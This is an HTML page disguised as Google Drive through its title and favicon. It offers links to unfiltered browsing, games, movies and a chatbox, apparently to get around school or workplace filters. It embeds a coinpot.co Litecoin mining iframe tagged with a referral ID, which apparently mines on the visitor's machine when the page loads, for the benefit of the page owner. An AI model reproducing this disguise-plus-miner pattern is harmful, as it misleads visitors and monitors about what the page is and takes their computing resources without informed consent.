<html lang="en-US">
<html lang="en-US">
<head profile="http://www.w3.org/2005/10/profile">
<link rel="icon"
      href="https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_4.ico">
</head>
</html>
</html>
<html>
<head>
  <title>My Drive - Google Drive</title>




  <style type="text/css">a {
    text-decoration: none;
    font-weight:bold;
    }
  </style>

  <style>

  a.button1{
   display:inline-block;
   padding:1.4em 2.0em;
   margin:0 0.3em 0.3em 0;
   border-radius:0.12em;
   box-sizing: border-box;
   text-decoration:none;
   font-family:'Roboto',sans-serif;
   font-weight:300;
   color:#FFFFFF;
   text-align:center;
   transition: all 0.2s;
   background-color:#9741ae;
   margin-top:10px;
  }
  a.button1:hover{
   color:#000000;
   background-color:#FFFFFF;
  }
  @media all and (max-width:30em){
   a.button1{
    display:block;
    margin:0.4em auto;
   }
  }
  </style>

  <style>

  body {
    text-align:center;
    background-color:#282828;
    background-repeat: fill;
    background-attachment: fixed;
    background-size: 100% 100%;
  }
  </style>



</head>

<body>

<a href="/local.html" class="button1"><b>Surf Freely</b></a>
<a href="/games.html" class="button1"><b>Play Games</b></a>
<a href="/movies.html" class="button1"><b>Watch Movies</b></a>
<a href="/chatbox.html" class="button1"><b>Chatbox</b></a>

<br/>
<br/>

<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/litecoin/?ref=D6975967F23F&mode=widget" style="overflow:hidden;width:1200px;height:800px;top:67px;"></iframe>

</body>
